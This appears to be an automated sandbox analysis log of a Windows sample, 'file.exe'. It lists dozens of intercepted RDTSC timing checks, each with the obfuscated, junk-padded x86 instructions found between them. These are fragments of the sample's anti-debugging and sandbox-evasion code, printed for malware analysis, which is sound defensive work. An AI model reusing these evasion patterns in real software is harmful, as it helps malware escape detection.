                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1028265 second address: 1028288 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC7025h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FC408FC701Ah 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1028288 second address: 102829A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007FC408FC8B14h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10564BD second address: 10564C2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10564C2 second address: 10564C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1056600 second address: 1056617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC408FC7021h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1056903 second address: 1056907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1056A99 second address: 1056A9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1056C11 second address: 1056C15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1056C15 second address: 1056C1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1056C1E second address: 1056C24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1056D26 second address: 1056D31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1056D31 second address: 1056D4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B14h 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1056D4A second address: 1056D50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1056D50 second address: 1056D62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007FC408FC8B06h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1056D62 second address: 1056D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1056D66 second address: 1056D6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105701F second address: 1057038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007FC408FC701Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007FC408FC7016h 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1057173 second address: 1057177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1057B65 second address: 1057BAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC408FC7016h 0x0000000a popad 0x0000000b jmp 00007FC408FC7029h 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007FC408FC701Fh 0x00000017 jns 00007FC408FC701Ah 0x0000001d push eax 0x0000001e push edx 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1057D1C second address: 1057D5E instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC408FC8B06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 pop edx 0x00000014 popad 0x00000015 pushad 0x00000016 jmp 00007FC408FC8B15h 0x0000001b jmp 00007FC408FC8B14h 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10581BF second address: 10581C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105B678 second address: 105B697 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FC408FC8B15h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105BE16 second address: 105BE20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102323F second address: 1023243 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10637E4 second address: 10637E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1063CBF second address: 1063CC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1063CC3 second address: 1063CF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC701Ah 0x00000007 push eax 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jnc 00007FC408FC7026h 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1063E1F second address: 1063E55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FC408FC8B0Eh 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007FC408FC8B16h 0x00000013 push eax 0x00000014 push edx 0x00000015 js 00007FC408FC8B06h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1063E55 second address: 1063E59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1063FB2 second address: 1063FC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jng 00007FC408FC8B06h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1063FC0 second address: 1063FC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106748A second address: 1067497 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC408FC8B06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10675B5 second address: 10675BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FC408FC7016h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1067B4C second address: 1067B51 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1067FBD second address: 1067FC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1068FEE second address: 1068FF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1069097 second address: 106909B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106A29E second address: 106A2A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106A2A4 second address: 106A2A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106A2A8 second address: 106A2AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106A2AC second address: 106A2D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jbe 00007FC408FC703Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC408FC7026h 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106A2D3 second address: 106A322 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jng 00007FC408FC8B0Bh 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007FC408FC8B08h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 0000001Bh 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c push 00000000h 0x0000002e mov edi, dword ptr [ebp+122D2C06h] 0x00000034 xchg eax, ebx 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106A322 second address: 106A328 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106B885 second address: 106B8B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 pushad 0x00000009 sub ebx, dword ptr [ebp+12465719h] 0x0000000f popad 0x00000010 push 00000000h 0x00000012 mov si, 4D7Ah 0x00000016 sub edi, dword ptr [ebp+122D1DDAh] 0x0000001c push 00000000h 0x0000001e push esi 0x0000001f add dword ptr [ebp+122D2435h], esi 0x00000025 pop edi 0x00000026 mov esi, dword ptr [ebp+122D2E36h] 0x0000002c xchg eax, ebx 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106B60A second address: 106B614 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC408FC7016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106C2FE second address: 106C317 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B15h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106CDFC second address: 106CE07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC408FC7016h 0x0000000a popad 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106CE07 second address: 106CE29 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC408FC8B08h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jns 00007FC408FC8B0Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007FC408FC8B06h 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106CB76 second address: 106CB93 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC7029h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106D74C second address: 106D756 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC408FC8B06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106CB93 second address: 106CB99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10710CD second address: 1071108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007FC408FC8B0Fh 0x0000000b jns 00007FC408FC8B06h 0x00000011 popad 0x00000012 popad 0x00000013 mov dword ptr [esp], eax 0x00000016 mov ebx, dword ptr [ebp+122D1D49h] 0x0000001c push 00000000h 0x0000001e cld 0x0000001f push 00000000h 0x00000021 mov edi, dword ptr [ebp+122D3383h] 0x00000027 xchg eax, esi 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b jbe 00007FC408FC8B06h 0x00000031 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106CB99 second address: 106CB9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1071108 second address: 107112B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FC408FC8B0Eh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106CB9D second address: 106CBA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1072185 second address: 10721A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10721A0 second address: 10721A5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107507A second address: 107507F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10762D7 second address: 10762DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10770F7 second address: 10770FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10762DC second address: 10762F2 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC408FC7018h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007FC408FC7016h 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1077EDD second address: 1077EE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10770FB second address: 107710B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007FC408FC7016h 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1077EE7 second address: 1077EF3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1077EF3 second address: 1077F63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC408FC7029h 0x00000009 popad 0x0000000a pop edx 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D3CD9h], esi 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007FC408FC7018h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 0000001Dh 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 clc 0x00000031 xchg eax, esi 0x00000032 jo 00007FC408FC7022h 0x00000038 jmp 00007FC408FC701Ch 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FC408FC701Ah 0x00000045 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10771E6 second address: 1077201 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a je 00007FC408FC8B0Ch 0x00000010 jns 00007FC408FC8B06h 0x00000016 pushad 0x00000017 push esi 0x00000018 pop esi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B1B9 second address: 107B25A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 push eax 0x00000007 js 00007FC408FC702Eh 0x0000000d jg 00007FC408FC7028h 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007FC408FC7018h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 00000017h 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e call 00007FC408FC701Bh 0x00000033 mov dword ptr [ebp+12465719h], ecx 0x00000039 pop ebx 0x0000003a push 00000000h 0x0000003c mov ebx, edx 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push edx 0x00000043 call 00007FC408FC7018h 0x00000048 pop edx 0x00000049 mov dword ptr [esp+04h], edx 0x0000004d add dword ptr [esp+04h], 0000001Ch 0x00000055 inc edx 0x00000056 push edx 0x00000057 ret 0x00000058 pop edx 0x00000059 ret 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d jno 00007FC408FC702Dh 0x00000063 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B25A second address: 107B264 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FC408FC8B06h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107C291 second address: 107C305 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 pushad 0x00000009 movzx eax, bx 0x0000000c mov dword ptr [ebp+122D1EBCh], ebx 0x00000012 popad 0x00000013 push 00000000h 0x00000015 call 00007FC408FC7027h 0x0000001a xor bl, FFFFFFE4h 0x0000001d pop edi 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ebp 0x00000023 call 00007FC408FC7018h 0x00000028 pop ebp 0x00000029 mov dword ptr [esp+04h], ebp 0x0000002d add dword ptr [esp+04h], 00000015h 0x00000035 inc ebp 0x00000036 push ebp 0x00000037 ret 0x00000038 pop ebp 0x00000039 ret 0x0000003a or dword ptr [ebp+1244BA1Bh], edi 0x00000040 sub dword ptr [ebp+122D380Bh], edx 0x00000046 xchg eax, esi 0x00000047 jmp 00007FC408FC7022h 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107C305 second address: 107C30A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107C30A second address: 107C310 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E2DC second address: 107E346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ebp 0x00000009 call 00007FC408FC8B08h 0x0000000e pop ebp 0x0000000f mov dword ptr [esp+04h], ebp 0x00000013 add dword ptr [esp+04h], 00000015h 0x0000001b inc ebp 0x0000001c push ebp 0x0000001d ret 0x0000001e pop ebp 0x0000001f ret 0x00000020 mov bx, di 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ebp 0x00000028 call 00007FC408FC8B08h 0x0000002d pop ebp 0x0000002e mov dword ptr [esp+04h], ebp 0x00000032 add dword ptr [esp+04h], 0000001Ch 0x0000003a inc ebp 0x0000003b push ebp 0x0000003c ret 0x0000003d pop ebp 0x0000003e ret 0x0000003f push 00000000h 0x00000041 movzx ebx, ax 0x00000044 add ebx, 4335044Ah 0x0000004a xchg eax, esi 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007FC408FC8B10h 0x00000052 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E346 second address: 107E359 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC408FC701Fh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E359 second address: 107E382 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007FC408FC8B1Eh 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E382 second address: 107E39C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC408FC7026h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E4F1 second address: 107E517 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC408FC8B06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC408FC8B18h 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E517 second address: 107E521 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107F39D second address: 107F3A3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107F3A3 second address: 107F3C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC7022h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop edi 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1088F8B second address: 1088F8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1088F8F second address: 1088FDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FC408FC7027h 0x00000014 popad 0x00000015 pushad 0x00000016 jmp 00007FC408FC701Dh 0x0000001b jmp 00007FC408FC7023h 0x00000020 push ebx 0x00000021 pop ebx 0x00000022 popad 0x00000023 pushad 0x00000024 push edi 0x00000025 pop edi 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1088FDF second address: 1088FF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC408FC8B14h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1088FF9 second address: 1089012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jng 00007FC408FC7016h 0x0000000f jno 00007FC408FC7016h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
